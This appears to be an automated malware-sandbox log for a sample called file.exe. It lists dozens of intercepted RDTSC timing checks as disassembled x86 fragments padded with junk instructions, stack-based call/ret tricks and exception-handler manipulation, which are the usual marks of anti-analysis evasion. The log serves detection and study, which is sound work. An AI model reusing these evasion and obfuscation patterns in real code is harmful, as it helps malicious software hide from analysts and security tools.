Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5AF695 second address: 5AF6AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB438C61F36h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5AF6AF second address: 5AF6B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B8783 second address: 5B8787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B8787 second address: 5B878B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B878B second address: 5B87A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FB438C61F2Ch 0x0000000d pop ebx 0x0000000e jo 00007FB438C61F3Ch 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B87A9 second address: 5B87B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FB4390A66B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5AF768 second address: 5AF76C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5AF76C second address: 5AF776 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB4390A66B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B9CFF second address: 5B9D05 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B9D05 second address: 5B9D79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4390A66C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007FB4390A66B8h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 xor di, 3C7Fh 0x0000002b push 00000000h 0x0000002d xor ebx, 2F67CD8Eh 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push edi 0x00000038 call 00007FB4390A66B8h 0x0000003d pop edi 0x0000003e mov dword ptr [esp+04h], edi 0x00000042 add dword ptr [esp+04h], 00000014h 0x0000004a inc edi 0x0000004b push edi 0x0000004c ret 0x0000004d pop edi 0x0000004e ret 0x0000004f push eax 0x00000050 pushad 0x00000051 push ebx 0x00000052 pushad 0x00000053 popad 0x00000054 pop ebx 0x00000055 pushad 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5BAD20 second address: 5BAD2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB438C61F26h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B493B second address: 5B4940 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B5872 second address: 5B5905 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438C61F38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov edi, 3B41F6C9h 0x0000000f push dword ptr fs:[00000000h] 0x00000016 push 00000000h 0x00000018 push ebp 0x00000019 call 00007FB438C61F28h 0x0000001e pop ebp 0x0000001f mov dword ptr [esp+04h], ebp 0x00000023 add dword ptr [esp+04h], 00000016h 0x0000002b inc ebp 0x0000002c push ebp 0x0000002d ret 0x0000002e pop ebp 0x0000002f ret 0x00000030 mov dword ptr fs:[00000000h], esp 0x00000037 pushad 0x00000038 and ebx, dword ptr [ebp+122D27F4h] 0x0000003e movsx edi, ax 0x00000041 popad 0x00000042 mov eax, dword ptr [ebp+122D08EDh] 0x00000048 or ebx, dword ptr [ebp+122D2950h] 0x0000004e push FFFFFFFFh 0x00000050 push 00000000h 0x00000052 push edi 0x00000053 call 00007FB438C61F28h 0x00000058 pop edi 0x00000059 mov dword ptr [esp+04h], edi 0x0000005d add dword ptr [esp+04h], 00000019h 0x00000065 inc edi 0x00000066 push edi 0x00000067 ret 0x00000068 pop edi 0x00000069 ret 0x0000006a mov dword ptr [ebp+12482465h], eax 0x00000070 nop 0x00000071 push ebx 0x00000072 push esi 0x00000073 push eax 0x00000074 push edx 0x00000075 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B9ECF second address: 5B9F51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 mov dword ptr [esp], eax 0x0000000b jmp 00007FB4390A66C1h 0x00000010 push dword ptr fs:[00000000h] 0x00000017 jmp 00007FB4390A66BBh 0x0000001c pushad 0x0000001d mov ebx, 0C7EA6F3h 0x00000022 call 00007FB4390A66BDh 0x00000027 mov dword ptr [ebp+122D201Fh], esi 0x0000002d pop esi 0x0000002e popad 0x0000002f mov dword ptr fs:[00000000h], esp 0x00000036 add di, 3594h 0x0000003b mov eax, dword ptr [ebp+122D05B1h] 0x00000041 pushad 0x00000042 push edx 0x00000043 jne 00007FB4390A66B6h 0x00000049 pop ecx 0x0000004a xor dword ptr [ebp+122D3030h], edi 0x00000050 popad 0x00000051 push FFFFFFFFh 0x00000053 jmp 00007FB4390A66BAh 0x00000058 or dword ptr [ebp+122D201Fh], ecx 0x0000005e push eax 0x0000005f push eax 0x00000060 pushad 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5BAE9F second address: 5BAEA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5BCE45 second address: 5BCE4F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB4390A66B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5BCE4F second address: 5BCEB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438C61F2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a or bl, FFFFFFC5h 0x0000000d sub dword ptr [ebp+12457571h], edi 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov ebx, dword ptr [ebp+122D224Ch] 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 add di, 62E8h 0x0000002c mov eax, dword ptr [ebp+122D0C09h] 0x00000032 push 00000000h 0x00000034 push edx 0x00000035 call 00007FB438C61F28h 0x0000003a pop edx 0x0000003b mov dword ptr [esp+04h], edx 0x0000003f add dword ptr [esp+04h], 00000019h 0x00000047 inc edx 0x00000048 push edx 0x00000049 ret 0x0000004a pop edx 0x0000004b ret 0x0000004c push FFFFFFFFh 0x0000004e add di, DEE4h 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 jg 00007FB438C61F28h 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C853F second address: 5C8543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C7CCA second address: 5C7CD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C7CD4 second address: 5C7CFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB4390A66C1h 0x0000000a popad 0x0000000b jo 00007FB4390A66C6h 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jo 00007FB4390A66B6h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C7E65 second address: 5C7E71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 ja 00007FB438C61F26h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CC4E9 second address: 5CC4ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D1982 second address: 5D1990 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB438C61F2Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D1B11 second address: 5D1B23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4390A66BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D1B23 second address: 5D1B36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jc 00007FB438C61F26h 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D1B36 second address: 5D1B3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D1B3C second address: 5D1B46 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB438C61F26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D1C91 second address: 5D1C97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D1C97 second address: 5D1CA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB438C61F2Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D1F60 second address: 5D1F64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D20DD second address: 5D20ED instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB438C61F26h 0x00000008 je 00007FB438C61F26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D20ED second address: 5D2143 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB4390A66C6h 0x00000008 ja 00007FB4390A66D4h 0x0000000e jc 00007FB4390A66B6h 0x00000014 jmp 00007FB4390A66C8h 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FB4390A66C6h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D22B3 second address: 5D22BF instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB438C61F26h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D2443 second address: 5D2447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D2447 second address: 5D244B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D7B53 second address: 5D7B57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D7B57 second address: 5D7B5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D7B5D second address: 5D7B7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB4390A66C5h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D7B7A second address: 5D7B7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A8E7F second address: 5A8E83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D73FB second address: 5D743F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007FB438C61F26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jp 00007FB438C61F2Eh 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jmp 00007FB438C61F2Eh 0x0000001b jmp 00007FB438C61F37h 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D743F second address: 5D7444 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D75D4 second address: 5D75EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438C61F2Bh 0x00000007 ja 00007FB438C61F32h 0x0000000d jns 00007FB438C61F26h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56E444 second address: 56E489 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB4390A66C9h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FB4390A66C1h 0x0000000f push ebx 0x00000010 jnc 00007FB4390A66B6h 0x00000016 jo 00007FB4390A66B6h 0x0000001c pop ebx 0x0000001d pop edx 0x0000001e pop eax 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FB4390A66C5h 0x00000027 push eax 0x00000028 pop eax 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56E489 second address: 56E48D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56752E second address: 567534 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DEE97 second address: 5DEEA5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FB438C61F26h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A3A98 second address: 5A3AA2 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB4390A66B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A3AA2 second address: 58DF21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438C61F30h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007FB438C61F28h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000019h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 jmp 00007FB438C61F2Dh 0x0000002b mov dword ptr [ebp+122D2C8Ch], eax 0x00000031 call dword ptr [ebp+122D315Fh] 0x00000037 jp 00007FB438C61F49h 0x0000003d pushad 0x0000003e jmp 00007FB438C61F2Bh 0x00000043 push edi 0x00000044 pop edi 0x00000045 popad 0x00000046 push edi 0x00000047 push eax 0x00000048 pop eax 0x00000049 jmp 00007FB438C61F30h 0x0000004e pop edi 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007FB438C61F2Fh 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A3F25 second address: 5A3F2B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A40C0 second address: 5A40E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov eax, dword ptr [eax] 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007FB438C61F34h 0x0000000f jng 00007FB438C61F26h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A40E5 second address: 5A4127 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4390A66BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push ecx 0x0000000e jl 00007FB4390A66B8h 0x00000014 push edi 0x00000015 pop edi 0x00000016 pop ecx 0x00000017 pop eax 0x00000018 jnc 00007FB4390A66C2h 0x0000001e mov ecx, dword ptr [ebp+122D2938h] 0x00000024 push 414BFC8Ah 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A4127 second address: 5A412D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A41F1 second address: 5A41F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A4318 second address: 5A431D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A43D2 second address: 5A43D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A4ADB second address: 5A4AF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007FB438C61F2Ch 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A4AF3 second address: 5A4B16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4390A66BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jc 00007FB4390A66C8h 0x00000011 push eax 0x00000012 push edx 0x00000013 jbe 00007FB4390A66B6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A4B16 second address: 5A4B1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58EB0D second address: 58EB1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jnc 00007FB4390A66B6h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58EB1A second address: 58EB24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FB438C61F26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58EB24 second address: 58EB28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58EB28 second address: 58EB33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5659E8 second address: 5659EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5659EE second address: 5659F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DF2E0 second address: 5DF2EA instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB4390A66B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DF2EA second address: 5DF2F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DF2F3 second address: 5DF315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FB4390A66B6h 0x0000000a popad 0x0000000b jmp 00007FB4390A66BBh 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jc 00007FB4390A66B6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DF315 second address: 5DF319 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DF319 second address: 5DF325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FB4390A66B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DF5AD second address: 5DF5B3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DF6E9 second address: 5DF6ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DF867 second address: 5DF86D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DF86D second address: 5DF871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DF9C2 second address: 5DF9DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jbe 00007FB438C61F26h 0x0000000c jp 00007FB438C61F26h 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 jnp 00007FB438C61F26h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DF9DF second address: 5DF9E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DF9E5 second address: 5DF9EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DFB53 second address: 5DFB57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DFB57 second address: 5DFB63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DFB63 second address: 5DFB6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FB4390A66B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E4DFD second address: 5E4E07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E4E07 second address: 5E4E13 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB4390A66B6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E50BA second address: 5E50BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E50BE second address: 5E50CD instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB4390A66B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E53C2 second address: 5E53C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E53C7 second address: 5E53E1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 jmp 00007FB4390A66C1h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E569A second address: 5E56A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
